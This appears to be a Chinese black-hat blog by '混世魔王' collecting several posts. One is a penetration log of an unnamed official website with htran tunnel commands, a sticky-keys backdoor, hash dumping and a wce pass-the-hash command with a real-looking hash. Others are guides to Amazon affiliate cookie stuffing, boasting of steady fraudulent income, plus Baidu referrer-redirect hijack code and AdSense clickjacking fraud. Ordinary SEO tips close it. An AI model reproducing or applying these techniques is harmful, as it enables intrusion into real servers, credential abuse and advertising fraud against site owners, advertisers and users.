某官网的渗透笔记,挖掘的某0DAY拿到webshell,USER权限,联通外网,提权SYSTEM的EXP无效,看来打的补丁很全,服务器用的是微软FTP,MSSQL,没啥突破口。路过其他盘,发现一个小有年份的BKF文件,貌似这个是用于系统的恢复和还原的.复制到WEB 目录下回来。装个虚拟机还原BKF文件。虚拟机就变成目标主机的系统了。没有密码登陆不进去了。插入WINPE光盘,替换sethc.exe ,做个shift后门,按5次shift进入主机,再新建一个帐号登陆。用pwdump抓hash,不幸的是ophcrack 没跑出来,既然有目标主机的hash了。转换下思路。
本地执行htran -s -listen 1234 8080
webshell执行htran -s -connect 本机IP 1234
得到一条8080的SOCK5代理
本地设置ProxyCap允许所有程序通过此代理连接,然后
wce.exe -s administrator
EVIL:25E42477F38A0E69181747D7808C7C1E:32F081A735766AD4CA68B15F6612CD7C 替换HASH
打开SQL Server 管理器,填写目标IP,选择WINDOWS认证,OK,成功登陆目标的SQL。接下来SQL提权。不多说了。
混世魔王 的技术博客
某官网的渗透笔记
对amazon Cookie Stuffing的作弊研究过程
CS的好处就不用说了。而AMZ的佣金是全站计算的,利润丰厚哦。群里就有些在做AMZ朋友。
之前没仔细研究,今天花时间看了看。混世魔王这里记录一下对amazon Cookie Stuffing作弊的研究过程。
首先生成几种AMZ的广告代码,制作来源和广告,记录cookies.
流程是 amz2.php 点击==》进入 amz1.php 再点击==》广告 ==进入AMZ站点,完成CS。
如果是单个产品推广,我们来拆解一下AMZ的代码,抓个包看下数据(下图),
有一个宽=1,高=1的图片,a=商品编号 t=推广账号
<img src=http://www.assoc-amazon.com/e/ir?t=混世魔王&l=as2&o=1&a=商品编号 width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" />
抓包就能看到这个连接的属性,是一个图片类型,没有生成cookies。我们来对这个连接植入IP数据,还有网站的PV数据。看看这个图片的作用。
在看下图AMZ 的数据,第一个,Impressions(展示) (Click-Through Rate)点击率 和 (Clicks)点击量
对比以后,就会发现之前PV值(1284)几乎是等于AMZ的(1295),知道这个数值用处,就很好伪造了。
第2点,击率是需要控制的。第3点,IP数是要大于点击数的。而这个链接的作用,我们可以基础的判断是类似于网站统计。
记录流量的访问来源。信息。这里来分析下,AMZ怎么判断来源的。
//encodeURIComponent 为url 编码
function encodeStr(b) {
return b && encodeURIComponent(b).replace(/&/g, "&").replace(/"/g, """).replace(/</g, "<").replace(/>/g, ">");
}
document.write("<iframe src='http://s.amazon-adsystem.com/iu3?d=assoc-amazon.com&rP=" + encodeStr((window.location != window.parent.location) ? document.referrer: document.location) + "&cB=" + Math.random() * 1E16 + "' width=1 height=1 frameborder=0 marginwidth=0 marginheight=0></iframe>");
//输出一个框架 <iframe > 内容为 .http://s.amazon-adsystem.com/iu3?d=assoc-amazon.com&rP= + 当前url+ &cb= 随机数 + 1e16(这个要从上面代码分析.)
</script>
<script>
function encodeStr(b) { //如输入 http://26836659.blogcn.com/ 返回 http://26836659.blogcn.com/
return b && encodeURIComponent(b).replace(/&/g, "&").replace(/"/g, """).replace(/</g, "<").replace(/>/g, ">");
}
function replaceTagUrls(allLinks) //进行正则判断.url是否为 http://amazon http://endless ... .com ...ca... .jp 等域名
{
var refRefurl = new RegExp("^http://.*(amazon|endless|myhabit|amazonwireless|javari|smallparts)\.(com|ca|co\.jp|de|fr|co\.uk|cn|it|es)/.*tag=.*linkcode=", "i");
var pageUrl = (window.location != window.parent.location) ? document.referrer: document.location;
for (var i = 0; i < allLinks.length; i++)
var href = new String(allLinks[i].href);//循环所有a标签的所有url
var results;
var tag_match;
var newUrl;
if (results = href.match(refRefurl)) { //如果判断成功
newUrl = href + "&ref-refURL=" + encodeStr(pageUrl);
href = newUrl;
allLinks[i].href = href; //添加所有url 内容 如 http://www.amazon.com/tag=xxxx&linkcode=xxxx 会添加http://www.amazon.com/tag=xxxx&linkcode=xxxx&ref-refURL= pageUrl(pageurl)为变量
}
}
}
function replaceAllURLs() {
var allAHrefLinks = document.getElementsByTagName('a');//获取所有a标签<a
var allAreaHrefLinks = document.getElementsByTagName('area');//获取area id
replaceTagUrls(allAHrefLinks);//
replaceTagUrls(allAreaHrefLinks);
}
replaceAllURLs();
接下来,继续抓包,当用户点广告击进入以后,又会怎么样了。看第2个动作。生成cookies,进入你的电脑。
当客户电脑里面,只要有你推广cookies,当他在AMZ购买了东西以后,佣金就是你的了。如果同时有几个cookies,已最后覆盖的为准。如下图。
所以如果你是在用黑帽做AMZ的时候,就算你的关键字不是第一,也没关系。AMZ对CS查的不严,即使有明显的作弊行为也很少K号。经过上面的分析,和注意事项,针对amazon的Cookie Stuffing代码出炉了。已经在群里开始了小测试。目前测试了10个账号,每个账号收入波动控制在500-1500刀。暂没出现K号情况。
百度黑帽SEO和黑客劫持的同台竞技
百度黑帽SEO和黑客劫持的同台竞技,这是一个关键字排名的案例。图片下面,第一个站,是给黑帽SEO的。第3个是用ASA黑客劫持的。
他是黑了都邦保险的官方做的权重劫持,可惜的是他劫持的代码没升级,被百度可以识别。
虽然,这个入侵者给一些隐患文件做了只读的权限设置。但是官网的漏洞比较明显啊。好几处。混世魔王路过。
唯一的共同点,是做了HTTP_REFERER 的判断跳转。
var s=document.referrer
if(s.indexOf("baidu")>0)
self.location="http://26836659.blogcn.com/";
用Cookie Stuffing影响百度和GG的广告
花了些时间研究了一下百度的排名技巧,貌似比起google,容易的多。不过是给客户做的淘宝和支付宝方面见不得的光的关键字。只在群里秀了下,程序还不完善,最近事多,忙不过来。混世魔王这里得先说一个做百度需要注意的事项,我之前都是做google,用的全部是外国空间,能正常访问,但百度就是不收录。用百度的检测工具,原来网站都不能被爬虫访问。
来说说用Cookie Stuffing影响百度和GG的广告,细心的人就会发现,百度也好,google 也好,是会在客户端会产生搜索cookies 的,根据用户的搜索cookies,显示在你网站的广告投放。
因为是自己的网站,这样就很容易用Cookie Stuffing植入搜索cookies到用户电脑来影响广告。
原理简单吧,代码也很简单。测试了百度,可行。GG应该差不多吧。
用处是,能有效的提高百度或者GG的单价。需要长期观察,暂时没听到啥负面影响。
百度虚拟劫持的黑帽SEO技术被小曝光了
百度虚拟劫持的黑帽SEO技术被电视小曝光了。
他虚拟劫持的都是GOV,EDU的域名。比较明显。
视频是4月出来的,在百度站长的通告,5月份对爬虫的升级。
老的劫持代码需要升级才行,不然百度会提示 你的网站中病毒了。
比较无语是的。下面的视频里说的,误操作下载,于是中了木马。
他不去搜色情关键字,不去点击,怎么会下载了?还不是自己上班的时候,想偷偷进入黄*色网站......
如何用百度baike做amazon和dangdang
如何用百度baike做amazon和dangdang。
这个应该是技巧类的,首先百度的百科权重很高。很容易获得关键字的排名。
但是百科的审核很严格,所以你要填写严谨的内容,啥东西严谨了。答案就是出版物--图书。
比如,你可以搜索我写的书,《脚本黑客攻防技术》。
可以看到这样弱弱的关键字,轻松就有了排名。我们来到 amazon 看看图书销售排行榜。
大家可以看到。第一本比较热门的书是 郭敬明的,小时代3.0:刺金时代。我们百度一下。
看看我图片标出的箭头,是不是关键字排名到第一个呢。
点击进入这个百科,你就会发现扩展阅读,就是Amazon 的推广链接。
很黄,很暴力。可以秒优,关键字。
缺点,百度的词条,是谁都可以编辑的。
很有可以今天辛辛苦苦的编辑了一晚上,第2天,所有的词条affiliates 链接,都变别人的了。
[原创]用Clickjacking 和Cookie Stuffing 刷 google adsense 能收钱的作弊方法
很多人都会羡慕别人的google adsense 账号,每个月上千刀,甚至上万刀。
国内能上千刀的账号,只有2种可能,
1,对方是个很牛的网站。
2.作弊了。
首先,混世魔王这里说到 用Clickjacking 和Cookie Stuffing 刷 google adsense 作弊方法,当然能收钱的方法了。
而且是大家每个月正着收钱了。要不然收不到钱,刷个几千亿,也是狗屁。
其次,你必须要是同道中人,这样我们才有交流的语言。google 是很强大的,需要我们共同应对。
要解决的几个大问题,Traffic Fake的流量,ref,Clickjacking的正常点击,Cookie Stuffing做的单价,CTR的几率,展示率。
把上面说的问题都解决了,可以幸福的收款4-6个月。
不过还是会K号,毕竟GOOLGE 不是小白,这个在google adsense 作弊内幕详细版,有图文和代码的说明,
这里就不说了。算留个伏笔。
欢迎有兴趣和有实力的朋友,联系我,参与混世魔王对 adsense 作弊研究。
google adsense作弊内幕-详细版
新网站一个月内劫持google sitelinks
google sitelinks 貌似是SEO的最高优化了,有人说一个网站想要出现sitelinks,域名要多久啊。网站要多少权重啊。
站内链接完全是机器自动生成的。根据Google 的说法,Sitelinks 的主要目的在于帮助用户更快速、以更简单的方式找到
所需的信息,当然,Google 只是对部分关键词排在首位的网站才提供Sitelinks。
最近建立的几个新站,都还是一个月不到的时间,就有1个已经出现了 google sitelinks 。
是偶然,还是必然?
现阶段,仍然没有太肯定的关于Sitelinks 实现机制的结论。
关注此帖,有待研究。
新网站如何让百度秒收录
看很多站长经常说,我的站,怎么还不收录啊。混世魔王这这里说点关于新网站如何让百度秒收录的问题。如果你site你的网站,是下图一样,做站,多有激情呀。对google 也效果。没太多高深的技术含量,高手略过。
第1。你网站做好了没?别网站没做好,就上线了。今天改下风格,明天修改下 style,大后天,觉得title 不好,又改改。
第2,你的内容够原创吗?网站原创和伪原创是给说滥的话题。
比如你采集了,下图的这个文章。即便你是伪原创了。对于新站来说百度收录可能性也非常低吧。
3.网站SEO结构好吗?经常看到目录 /aaa/bbb/ccc/ddd.html . 还有一些 关键字URL的优化。TITILE 和描述。网站能在几秒内打开,这是SEO基础的。不说了。
4,首页出发,2次点击,能找到任何你想要的文章吗?这个还是和目录结构有关。测试下看看,是否符合2次点击。(特别声明一下,我这里说的是一个新的网站上线)
5,分页有外链吗?外链,这也是讨论烂透了的话题,谁都会给主页做外链。混世魔王这里想问问你,分页有外链吗?
6,月经正常吗? 要是你女朋友和你说,这个月的月经没来会怎样? 网站的服务器是否稳定,域名是否是被K过的。
欢迎 留言 补充 寻Q 讨论。
文章来源 混世魔王 的技术BLOG http://26836659.blogcn.com












